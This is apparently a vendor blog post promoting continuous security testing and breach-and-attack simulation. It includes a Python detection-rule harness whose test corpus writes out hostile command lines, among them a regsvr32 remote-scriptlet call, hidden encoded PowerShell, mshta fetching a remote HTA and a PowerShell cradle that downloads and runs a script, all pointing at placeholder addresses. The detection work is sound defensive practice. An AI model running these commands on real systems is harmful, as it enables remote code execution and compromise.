What if security teams could take back the advantage of time? Instead of waiting for an attacker to find their exposure points, they would find their own security gaps first. It may sound dramatic, but waiting is exactly what most companies do when it comes to testing the effectiveness of their security controls.
Rather than proactively challenging their defenses to determine whether they are safe right now, most companies wait until their next periodic pen test or red team exercise. Vulnerability scans, penetration tests and red team exercises are effective at uncovering gaps, but relying on tests that are performed, at best, once a month is risky: a control that was working on the day of the test can be silently broken for weeks before the next one.
Continuous Security Testing 101
Continuous security testing is the practice of challenging, measuring and optimizing security controls on an ongoing basis with the objective of continually reducing an organization’s attack surface and improving its security posture. Echoing Gartner’s CARTA model, which advocates moving from point-in-time security decisions to more continuous security processes, continuous security testing leverages automated testing tools to give back to security teams the advantage of time.
According to a recent SANS Institute poll, only 14.1% of organizations test their security on a weekly basis; the rest test on a monthly (19.7%), quarterly (21.7%), annual (26.3%) or occasional (15.7%) basis, or only after an incident or breach occurs (2.5%).
Figure 1: Continuous security testing helps defend against the latest threats faster
Motives for Continuous Control Validation
But if your organization is looking to take a ‘lean forward’ stance on its cyber posture rather than rely on months-old reports from previous engagements, and if it wants to preemptively find security holes before threat actors do, then automated, continuous security risk assessments should be at the top of your list. Here’s why:
• New threats emerge daily – According to av-test.org, around 350,000 new malware samples and potentially unwanted applications are identified every day. Each of them adds new indicators of compromise (IoCs) such as file hashes, domains and addresses that your controls need to recognize, so it makes sense to verify that your security controls actually catch these variants as frequently as you can.
These types of immediate threats may include ransomware payloads, banking Trojans, generic keyloggers, cryptominers, cryptostealers and other menaces.
• Stealth techniques evolve – New tactics, techniques and procedures (TTPs) continually emerge and are used in the wild, and signature-based controls may or may not detect them. It is therefore advisable to check that behavior-based detection tools such as sandboxes, EDRs, EPPs, NGAVs and other tools that rely on machine learning can spot suspicious maneuvers when they occur.
These include evasion-by-design techniques such as file obfuscation to thwart AV software, C2 communications hidden inside encrypted channels, and others. Identifying fileless attacks that use living-off-the-land techniques also requires behavior-based detection, as these abuse legitimate, signed tools such as PowerShell and Regsvr32 to mask malicious activity; there is no malicious file on disk for a signature to match, so the detection has to key on what the process does and who launched it.
• IT environments change frequently – Day-to-day operations may inadvertently affect an organization’s security posture. Network policy changes, tool configuration updates, the rollout of new applications or software and the addition of new endpoints, servers and cloud services may all create cracks in your defenses. Are your crown jewels still protected?
The only way to know whether your SIEM is still raising critical alerts from the telemetry of your 20, 40 or more security controls is to test it after every change made to your IT environment, moving from speculation to simulation: replay known-bad activity and confirm that the expected alert still fires.
• State-sponsored threat actors – Most organizations cannot compete with the resources of state-sponsored APT groups. These groups are equipped with the know-how and resources needed to discover and exploit vulnerabilities, as well as the time required to perform thorough reconnaissance.
APTs typically start with a credible spear-phishing email, gain a foothold on ‘patient 0’ using advanced TTPs, and move laterally through your network to find critical and lucrative information assets.
As your adversary’s day job is to attack and compromise your network, continually testing across the APT kill chain, from pre-exploitation (attack delivery) to exploitation (system compromise) to post-exploitation (actions on objectives), enables your organization to consistently reduce its attack surface and thwart sophisticated attacks.
• Touchpoints with supply chains – Save for air-gapped networks used by government and military organizations, no company is an island. Companies usually interface to some extent with customers, suppliers and contractors to offer services, enable transactions and collaborate.
Figure 2: Threat Modeling using MITRE ATT&CK enables testing across various TTPs
Health Information Exchanges (HIEs) link pharmacies, healthcare providers and insurance plans. Payment gateways connect customers to merchants and card schemes. And threat actors are known to launch watering-hole attacks by compromising IT ticketing portals and MSSP websites, disguising malware infection points as links to software updates. Frequently challenging your controls against these potential touchpoints helps reduce the risk arising from supply chain attacks.
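The two points made above in the ‘Stealth techniques evolve’ and ‘IT environments change frequently’ bullets can be shown concretely in code. The following Python sketch is an added example, not code from the original post or from Cymulate’s platform: it implements a handful of behavior-based rules for living-off-the-land process activity (Regsvr32 loading a remote scriptlet, encoded PowerShell, Mshta fetching remote or inline script, an Office application spawning a script host) and a replay harness that runs a labelled corpus of known-bad and known-good events through those rules, so that a change to the rules, the endpoint agent or the log pipeline shows up as a concrete regression. The event fields, rule wording, labels and the 192.0.2.0/24 addresses are constructed for the example; the ATT&CK technique IDs are the public ones for these behaviours.

```python
import re

# Binaries that commonly act as script hosts or proxy-execution tools.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
# spellings are listed here. A production rule should enumerate all of them.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s", re.I)


def normalize(event):
    """Lower-case the matched fields and reduce image paths to a file name."""
    def base(path):
        return re.split(r"[\\/]", path)[-1].lower()
    return {"image": base(event["image"]),
            "parent": base(event["parent"]),
            "cmd": event["cmd"].lower()}


# (rule name, ATT&CK technique ID, predicate over a normalized event).
# Illustrative rules written for this example, not a production rule set.
RULES = [
    ("regsvr32 remote scriptlet", "T1218.010",
     lambda e: e["image"] == "regsvr32.exe"
     and re.search(r"/i:\s*https?://", e["cmd"]) is not None
     and "scrobj.dll" in e["cmd"]),
    ("powershell encoded command", "T1059.001",
     lambda e: e["image"] == "powershell.exe"
     and ENCODED_FLAG.search(e["cmd"]) is not None),
    ("mshta remote or inline script", "T1218.005",
     lambda e: e["image"] == "mshta.exe"
     and re.search(r"https?://|javascript:|vbscript:", e["cmd"]) is not None),
    ("office app spawned script host", "T1204.002",
     lambda e: e["parent"] in OFFICE_APPS and e["image"] in SCRIPT_HOSTS),
]


def detect(event):
    """Return the (rule name, technique) pairs that fire for one process-creation event."""
    e = normalize(event)
    return [(name, tid) for name, tid, pred in RULES if pred(e)]


# Constructed process-creation events (Sysmon Event ID 1 style fields), each
# labelled with the rule expected to fire (None = benign, nothing should fire).
LABELLED_CORPUS = [
    ("squiblydoo launched from a Word macro", "regsvr32 remote scriptlet",
     {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
      "image": r"C:\Windows\System32\regsvr32.exe",
      "cmd": "regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll"}),
    ("encoded powershell from explorer", "powershell encoded command",
     {"parent": r"C:\Windows\explorer.exe",
      "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
      "cmd": "powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}),
    ("mshta pulling a remote HTA", "mshta remote or inline script",
     {"parent": r"C:\Windows\System32\cmd.exe",
      "image": r"C:\Windows\System32\mshta.exe",
      "cmd": "mshta.exe http://192.0.2.10/launch.hta"}),
    ("excel spawning a download cradle", "office app spawned script host",
     {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
      "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
      "cmd": 'powershell.exe -w hidden -c "iwr http://192.0.2.10/a.ps1 | iex"'}),
    ("installer registering a local COM dll", None,
     {"parent": r"C:\Windows\System32\msiexec.exe",
      "image": r"C:\Windows\System32\regsvr32.exe",
      "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\vendorcomp.dll"'}),
    ("admin running a signed backup script", None,
     {"parent": r"C:\Windows\explorer.exe",
      "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
      "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"}),
]


def validate(corpus):
    """Replay a labelled corpus through the rules.

    Returns (missed_detections, false_positives) as lists of labels, so a run
    after a rule, agent or log-pipeline change shows exactly what regressed.
    """
    missed, false_positives = [], []
    for label, expected, event in corpus:
        fired = {name for name, _ in detect(event)}
        if expected is not None and expected not in fired:
            missed.append(label)
        if expected is None and fired:
            false_positives.append(label)
    return missed, false_positives


if __name__ == "__main__":
    for label, _, event in LABELLED_CORPUS:
        print(f"{label:40} -> {detect(event) or 'no alert'}")
    print("regressions (missed, false positives):", validate(LABELLED_CORPUS))
```

The harness is the part that matters for continuous testing: the corpus stays fixed, and `validate()` is re-run whenever something upstream changes. If, for instance, a log forwarder update stops populating the parent-process field, the Office-spawned-script rule silently stops firing, and the replay reports that label under `missed` rather than leaving the gap to be discovered by the next red team exercise.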
Explore Testing À La Continuous
Ready to experience automated security risk assessments using breach and attack simulation technology?
Download the brochure, read about Testing Security Effectiveness with the MITRE ATT&CK™ solution brief, or sign up for a free trial today.
Figure 3: Automated, continuous testing with Cymulate’s breach and attack simulation platform